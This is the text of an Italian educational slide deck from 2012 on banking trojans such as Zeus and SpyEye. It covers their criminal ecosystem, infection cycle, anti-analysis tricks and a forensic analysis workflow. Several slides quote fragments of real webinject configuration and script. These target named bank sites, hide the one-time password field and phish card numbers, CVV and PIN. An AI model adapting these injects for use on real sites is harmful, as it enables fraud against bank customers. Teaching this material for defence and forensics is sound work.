Malware Bancario

INTRODUZIONE AL CRIMEWARE NEL SETTORE BANCARIO

PRESI NELLA RETE - COLLEGIO GHISLIERI23 NOVEMBRE 2012

Dott. Francesco Schifilliti

COS’È UN BANKING TROJAN?

001

This term refers to the subset of malware

seeking to steal/theft data from electronic bank

accounts.

Within this context, other financial services

such as, for instance, online stock exchange

operations are also considered electronic

banking.

Zeus, SpyEye… e tanti altri

002

Zeus

SpyEye

AresTatanga

OddjobCarberp

Zeus

GameOve

r

GatakaShylock

CitadelCridexTorpig

Soggetti (minimi) Coinvolti

003

CyberCrimeOrganizatio

n

Developers

BlackMarket

MoneyMule/Pack Mule

Malware Developing

004

CyberCrimeOrganizatio

nBlackMarket(Freelance

developers)

Developers(Affiliates)

Malware Distribution

005

MalwareAuthors

User?

Malware Distribution

006

MalwareAuthors

Pay-per-Install

Drive-by-Download

Exploit-as-a-Services

Ciclo Pay-per-Install

007

MalwareAuthors

Kingpin

Exploit-as-a-Services

Fase di Infezione e Controllo

008

Exploit Pack

Compromised Web Site

Infection

Infection Trojan Repository

Mail di Spam

Iterando il processo d’Infezione…

009

Flat Botnet P2P Botnet

Ciclo d’Infezione di un Malware sul PC

010

Infezione sul Disco

(ad es. SpyEye copia il file C:\cleansweep.exe)

Rendere ‘Persistent

’ il MW

(ad es. con lamodifica del

registry)

Injection

(generalmente sul

processo Explorer)

Estensione della

Injection

(generalmente con tecniche di

Hooking in Userland)

Connessione

persistente col Server

di C&C

Odore di $$$

011

C & C Server

User

data theft

data & session

theft

Man in the Browser

012

SO

Kernel-land

User-land

Anti-Detection/Deception Techniques MW Code

013

Anti Memory

Anti Emulation

Anti Debugging

Anti Disassembler

Cryptography

Packing & Protecting

Obfuscation

Struttura di SpyEye

014

PBinary

Plugin del Malware:• config.dat,

ccgrabber• collectors, sock5• customconnector• webinjectors.txt

PackerObfuscation

Anti-Dbg

C&C

Un pezzettino di Webinjector di uno SpyEye 10.7

015

…..

set_url *meine.deutsche-bank.de/trxm/db/*european.transfer.enter.data* GPdata_before<bodydata_enddata_inject style="visibility:hidden”data_enddata_after id=data_enddata_before

</body>data_enddata_inject<script src='/error.html/trxm1/dbb.do?act=getall&domain=DB'></script><script src='/error.html/trxm1/dbcommon.js'></script><script src='/error.html/trxm1/dbsepa.js'></script><script>if (typeof _n_ck == "undefined"){document.body.style.visibility = 'visible';}</script>data_enddata_after</html>data_end

…..

Un pezzettino di Webinjector di un ATS

016

…..

set_url *commbank.com.au/netbank/UserMaintenance* GPdata_before<h1 class="PageTitle">*My Q*</h1>data_enddata_inject<script language="javascript" type="text/javascript”>window.onload = function() {

for ( i=0; i < document.links.length; i++ )if (document.links[i].id != 'H_LogOffLink' &&

document.links[i].id != 'ctl00_HeaderControl_LogOffLink’)document.links[i].onclick = function() { return

false; };};</script><script language="javascript" type="text/javascript”>

var clck_counter = 0;function msg(){

clck_counter++;if (clck_counter==2){

document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.visibility = "hidden”;

document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.display = "none

document.getElementById('ctl00_BodyPlaceHolder_btnGenSMS_field').disabled = true;

document.getElementById('error').style.top = 42;

document.getElementById('error').style.left = 42;

document.getElementById('error').style.visibility = "visible”;

document.getElementById('error').style.display = "block”;

}return false;

}

…..

Webinject in Chiaro nella RAMhttps://bcol.barclaycard.co.uk*cardSummary*∏‹∏:](È È È∏Í∏Í√ <style type="text/css">#inject { display: none; }.ui-dialog { width: 400px; font-size: 11px; }.ui-dialog .ui-dialog-titlebar-close { visibility: hidden; }.ui-dialog .ui-dialog-titlebar { visibility: hidden; display: none; }</style> Pfiıº| ÓΩ|HÓΩ|pÓΩ|òÓ≤ıº|¿ÓΩ|ËÓ∏˘º|Ô˙º|8Ô˙º|`ÔπàÔπ∞Ô∫ÿÔ∫–·∞Ô

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js"></script>

value=unescape(document.cookie.substring(offset, end)) jQuery("#inject_cc").focus();

} else if (jQuery("#inject_expdate_mm").val().length < 2) {

alert('Please enter Exp.Date'); jQuery("#inject_expdate_mm").focus();

} else if (jQuery("#inject_expdate_yy").val().length < 2) {

alert('Please enter Exp.Date'); jQuery("#inject_expdate_yy").focus();

} else if (jQuery("#inject_cvv").val().length < 3) {

alert('Please enter correct CVV'); jQuery("#inject_cvv").focus();

} else if (jQuery("#inject_pin").val().length < 5) {……. 017

SpyEye: esempio di MW modulare e parametrico

018

C & C Server

User

Cosa/Come Rubare è definito in base ai Plugin Installati sulla Bot. billinghammer.dll_5f00ca74679332c15ebe2e682a19e8c9bugreport.dll_a6c1992119c1550db437aac86d4ffdadccgrabber.dll_5b1593855a6e8f01468878eb88be39dfcreditgrab.dll_0e0c1855fa82ca3ad20bbe30106657b2ffcertgrabber.dll_6b5ffc56cec8f60a448fe7a9044625a5Plugin_CreditGrab.dll_0e0c1855fa82ca3ad20bbe30106657b2rdp.dll_0cb722049e024f2366ba9c187cb3929fddos.dll_716d82810241daa5e2a41327014e9a77…su Quale Banca/Ist. Finanziario

fare operazioni in Frode è definito in webinjectors.txt

CollectorCollectorCollector

a Chi Trasmettere i dati collezionatidal MW è definito in collectors.txt

Uno Schema di Riferimento dell’Analisi

019

Forensic Ananlysis

Disk Analysis

MW Searching

Reg. Analysis

Browser Analysis File Analysis

Hash Comparing

Entropy Analysis

MW Analysis

De- Anti-XYZ Disassebling Debugging

Memory Dumping

Live Analysis

Network Analysis

Memory Analysis

PIENA COMPRENSIONE DEL FORENSIC ARTIFACT

GRAZIE

Francesco Schifilliti

fschifilliti@forensictech.it